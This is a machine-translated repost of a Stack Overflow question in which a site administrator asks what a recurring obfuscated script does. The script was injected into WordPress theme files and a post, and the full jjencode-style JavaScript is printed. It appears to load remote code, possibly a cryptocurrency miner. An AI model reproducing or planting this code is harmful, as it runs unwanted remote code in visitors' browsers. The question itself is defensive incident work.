gpt4 book ai didi

javascript - 网站感染了重新出现的 JS 恶意软件。这段代码有什么作用?

转载 作者:行者123 更新时间:2023-11-29 15:16:51 25 4
gpt4 key购买 nike

<分区>

我是一家托管大约 100 个域的小公司的新聘 IT 人员。我刚刚将我们所有的域从一台主机移到了另一台。

我注意到我们的一个域在旧服务器上感染了恶意软件,所以我删除了它并将 dom 移动到我们的新服务器。

经过一周的检查,坏了<script>已重新出现在新服务器上,因此我知道感染来自 WordPress 文件(不是受感染的服务器)。当然,所有登录密码都已更改。

此脚本被注入(inject)三个文件(主题的 header.php、footer.php、index.php)和一个数据库条目(默认的 WP“hello-world”帖子):

<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+$.$$$_+(![]+"")[$._$_]+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"('\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"');"+$.$$$_+(![]+"")[$._$_]+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$._$$+"://\\"+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+"."+$.$$__+(![]+"")[$._$_]+$._$+$.$$_$+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.$$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"/\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$__+$.$$$+(![]+"")[$._$_]+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$.$__+$.$$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$_+$.__$+$.$_$+$.$$_$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$._$_+$.$__+$.$___+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+$.___+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.___+$._$$+$.__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+$._$_+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.__$+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$._$$+"_\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.___+$.$$__+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$$_+$.__$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$_$+$.$$_$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$._$_+$.__$+$.$$__+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.__$+$.$$_+$.$$__+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.$__+$.$_$_+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$_$+$.$_$+$.$__+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+$.$$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.$$_+$.$$$+$.$_$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"?"+$.__+"\\"+$.__$+$.$$_+$._$_+(![]+"")[$._$_]+"="+$.___+"."+$._$$+$.___+"';"+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+"."+$.$_$_+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.$$_$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.$$$_+(![]+"")[$._$_]+");"+"\"")())();</script>

Link to beautified pastebin.

我的主要问题是,该代码的作用是什么?谁能运行它并告诉我它产生了什么?

此外,这是感染最终结果的屏幕截图。给一些加密货币矿工的电话(我认为)。

Screenshot of infection target

谢谢,SO。我已经在这个问题上花了太多时间。

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com